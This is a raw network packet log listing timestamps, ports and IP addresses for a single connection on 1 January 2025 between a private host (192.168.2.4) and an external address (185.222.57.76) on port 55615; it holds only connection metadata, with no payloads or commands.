Jan 1, 2025 12:32:23.464447021 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464473009 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464477062 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464499950 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464520931 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464529037 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464531898 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464569092 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464597940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464628935 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464652061 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464679003 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464703083 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464745998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464756012 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464786053 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464792013 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464843035 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464848995 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464900017 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464951038 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.464956045 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464986086 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.464993000 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465022087 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465048075 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465066910 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465090036 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465101957 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465120077 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465147018 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465157032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465162992 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465200901 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465207100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465220928 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465256929 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465256929 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465297937 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465308905 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465353966 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465363026 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465400934 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465404987 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465420961 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465437889 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465447903 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465451002 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465457916 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465483904 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465492964 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465497971 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465526104 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465534925 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465543985 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465564013 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465572119 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465585947 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465595961 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465605021 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465605021 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465616941 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465646982 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465687990 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465703011 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465707064 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465717077 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465732098 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465740919 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465760946 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465763092 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465775967 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465785980 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465800047 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465809107 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465811014 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465831041 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465837955 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465841055 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465854883 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465872049 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465881109 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465887070 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465903044 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465919971 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465919971 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465930939 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465949059 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465956926 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465965986 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.465965986 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.465977907 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.466001987 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469194889 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469203949 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469247103 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469258070 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469295979 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469302893 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469311953 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469331026 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469340086 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469353914 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469367027 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469413996 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469422102 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469428062 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469439983 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469469070 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469472885 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469484091 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469484091 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469521999 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469547033 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469561100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469569921 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469580889 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469614029 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469621897 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469629049 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469631910 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469669104 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469671011 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469681025 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469688892 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469719887 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469727993 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469738007 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469738960 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469780922 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469780922 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469790936 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469841957 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.469922066 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469930887 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469934940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469943047 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469953060 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469961882 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469985962 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469995022 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.469995022 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470001936 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470009089 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470014095 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470032930 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470033884 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470043898 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470061064 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470076084 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470079899 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470086098 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470103025 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470110893 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470122099 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470139027 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470164061 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470204115 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470211983 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470216036 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470218897 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470233917 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470242023 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470261097 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470267057 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470278025 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470280886 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470316887 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470355034 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470365047 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470371962 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470379114 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470395088 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470400095 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470403910 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470432043 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470443964 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470443964 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470455885 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470472097 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470480919 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470489979 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470494032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470498085 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470509052 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470541954 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470552921 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470561981 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470566988 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470586061 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470602036 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470618963 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470634937 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470643997 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470681906 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470684052 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470695019 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470705986 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470714092 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470721960 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470735073 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470761061 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470828056 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470837116 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470840931 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470849037 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470868111 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470877886 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470880985 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470896006 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470912933 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470921993 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.470935106 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470942974 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470963001 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470972061 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.470983028 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471013069 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471015930 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471026897 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471045017 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471054077 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471060038 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471096992 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471097946 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471107006 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471115112 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471122980 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471139908 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471148014 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471155882 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471163988 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471174002 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471189022 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471195936 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471203089 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471204996 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471231937 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471240044 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471251011 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471272945 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471287966 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471303940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471333027 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471340895 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471364021 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471378088 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471395016 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471404076 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471412897 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471421003 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471435070 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471441984 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471450090 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471451044 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471455097 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471458912 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471473932 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471484900 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471493006 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471502066 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471523046 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471534967 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471539021 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471544027 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471587896 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471591949 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471596956 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471607924 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.471641064 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.471657038 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474066019 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474106073 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474113941 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474133968 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474153042 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474159002 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474169970 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474194050 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474203110 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474211931 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474224091 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474230051 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474239111 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474248886 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474266052 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474277020 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474293947 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474302053 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474340916 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474350929 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474359989 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474392891 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474409103 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474412918 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474422932 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474457026 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474495888 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474504948 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474522114 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474529982 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474541903 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474556923 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474605083 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474616051 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474621058 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474658012 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474667072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474668980 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474687099 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474704027 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474714041 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474725008 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474756956 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474782944 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474792004 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474828005 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474853992 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474862099 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474904060 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474924088 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474932909 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474956036 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474966049 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.474977970 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.474992037 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475013018 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475044012 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475059032 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475095034 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475116014 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475162983 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475172997 CET	55615	49748	185.222.57.76	192.168.2.4
